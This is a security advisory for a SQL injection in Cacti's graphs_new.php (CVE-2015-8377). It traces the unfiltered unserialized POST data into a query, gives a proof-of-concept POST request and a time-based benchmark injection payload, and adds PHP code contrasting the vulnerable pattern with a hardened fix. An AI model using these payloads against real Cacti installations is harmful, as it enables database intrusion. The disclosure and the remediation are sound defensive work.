Sunday, December 13, 2015

[FD] [CVE-2015-8377] Cacti graphs_new.php SQL Injection Vulnerability

==========================
Advisory: Cacti SQL Injection Vulnerability
Author: xiaotian.wang@dbappsecurity.com.cn
Affected Version: 0.8.8.f (the latest version and the older versions)
Vendor URL: http://www.cacti.net/
Vendor Status: Unfixed
==========================
Vulnerability Description
==========================

Vulnerable file: /cacti/graphs_new.php

/cacti/graphs_new.php line 35:

    if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }
    switch ($_REQUEST["action"]) {
        case 'save':
            form_save(); // highlight 1
            break;
        ……

Notice the highlighted call and track the function form_save():

/cacti/graphs_new.php line 59:

    function form_save() {
        // part of the code omitted ……
        if (isset($_POST["save_component_new_graphs"])) {
            host_new_graphs_save(); // highlight 2
            header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
        ……

Track the function host_new_graphs_save():

/cacti/graphs_new.php line 126:

    function host_new_graphs_save() {
        $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"])); // just unserialize, no filter
        /* form an array that contains all of the data on the previous form */
        ……
        debug_log_clear("new_graphs");
        while (list($form_type, $form_array) = each($selected_graphs_array)) {
            $current_form_type = $form_type;
            while (list($form_id1, $form_array2) = each($form_array)) {
                /* enumerate information from the arrays stored in post variables */
                if ($form_type == "cg") {
                    $graph_template_id = $form_id1;
                } elseif ($form_type == "sg") {
                    while (list($form_id2, $form_array3) = each($form_array2)) {
                        $snmp_index_array = $form_array3;
                        $snmp_query_array["snmp_query_id"] = $form_id1;
                        $snmp_query_array["snmp_index_on"] = get_best_data_query_index_type($_POST["host_id"], $form_id1);
                        $snmp_query_array["snmp_query_graph_id"] = $form_id2; // highlight 3
                    }
                    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]); // no filter, causes a SQL injection

Notice that $selected_graphs_array is simply the unserialized POST variable, which the request sender controls and which is never filtered. The value is then walked as a three-dimensional array, and the controlled key $form_id2 is finally concatenated into the SELECT query, which causes a SQL injection.

==========================
POC && EXP
==========================
1. Login
2. POST http://target/cacti/graphs_new.php
   Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=1&host_id=1&selected_graphs_array=[injection]
   {Injection exp can be found on my server: http://ift.tt/1QmlYJs}
3. mysql log:
   select graph_template_id from snmp_query_graph where id=1 and benchmark(20000000,sha1(1))--
====================
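The pattern the advisory describes, as an added example that is neither Cacti's code nor part of the advisory: the unvalidated concatenation from host_new_graphs_save() beside a hardened equivalent that refuses non-integer ids and binds the value. It assumes PHP 7 or later (for the allowed_classes option of unserialize) and PDO with the SQLite driver for an in-memory stand-in table; the functions vulnerable_query and safe_graph_template_id, the sample POST bodies and the table contents are this example's own.

```php
<?php
// Added example, not Cacti's code. Function names, sample data and the
// SQLite table are constructed for illustration.

// Vulnerable shape: the nested array key comes straight out of the
// unserialized POST body and is concatenated into the statement.
function vulnerable_query(string $posted): string
{
    $selected = unserialize(stripslashes($posted)); // no filter, as in the advisory
    if (!is_array($selected)) {
        return '';
    }
    $sql = '';
    foreach ($selected as $form_type => $form_array) {
        if ($form_type !== 'sg' || !is_array($form_array)) {
            continue;
        }
        foreach ($form_array as $form_id1 => $form_array2) {
            foreach ($form_array2 as $form_id2 => $unused) {
                // $form_id2 is attacker-controlled and lands in the SQL text
                $sql = "select graph_template_id from snmp_query_graph where id=" . $form_id2;
            }
        }
    }
    return $sql;
}

// Hardened shape: no objects from unserialize, every id must be a
// non-negative integer, and the id is bound rather than concatenated.
function safe_graph_template_id(PDO $db, string $posted): ?int
{
    $selected = unserialize($posted, ['allowed_classes' => false]); // PHP >= 7.0
    if (!is_array($selected) || !isset($selected['sg']) || !is_array($selected['sg'])) {
        throw new InvalidArgumentException('selected_graphs_array must be an array with an "sg" entry');
    }
    $result = null;
    foreach ($selected['sg'] as $snmp_query_id => $graphs) {
        if (!is_int($snmp_query_id) || $snmp_query_id < 0 || !is_array($graphs)) {
            throw new InvalidArgumentException('snmp_query_id must be a non-negative integer');
        }
        foreach ($graphs as $snmp_query_graph_id => $indexes) {
            // PHP keeps a key such as "7 and ..." as a string; only real integers pass.
            if (!is_int($snmp_query_graph_id) || $snmp_query_graph_id < 0) {
                throw new InvalidArgumentException('snmp_query_graph_id must be a non-negative integer');
            }
            $stmt = $db->prepare('select graph_template_id from snmp_query_graph where id = :id');
            $stmt->execute([':id' => $snmp_query_graph_id]);
            $row = $stmt->fetchColumn();
            $result = ($row === false) ? null : (int) $row;
        }
    }
    return $result;
}

// Demo with an in-memory SQLite table standing in for Cacti's snmp_query_graph.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('create table snmp_query_graph (id integer primary key, graph_template_id integer)');
$db->exec('insert into snmp_query_graph values (7, 42)');

// Constructed POST bodies: a benign one and one whose key is the value
// seen in the advisory's mysql log line.
$benign  = serialize(['sg' => [3 => [7 => [1 => true]]]]);
$hostile = serialize(['sg' => [3 => ['7 and benchmark(20000000,sha1(1))-- ' => [1 => true]]]]);

echo "vulnerable: ", vulnerable_query($hostile), "\n";
echo "hardened (benign): ", var_export(safe_graph_template_id($db, $benign), true), "\n";
try {
    safe_graph_template_id($db, $hostile);
} catch (InvalidArgumentException $e) {
    echo "hardened (hostile) rejected: ", $e->getMessage(), "\n";
}
```

The same integer check belongs on snmp_query_id and host_id, which the excerpt also reads from the request. Binding the id fixes the injection, but passing untrusted input through unserialize at all is the larger risk, since a serialized object graph can reach magic methods; the allowed_classes => false option limits that on PHP 7, and moving the form data to a JSON body removes it entirely.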
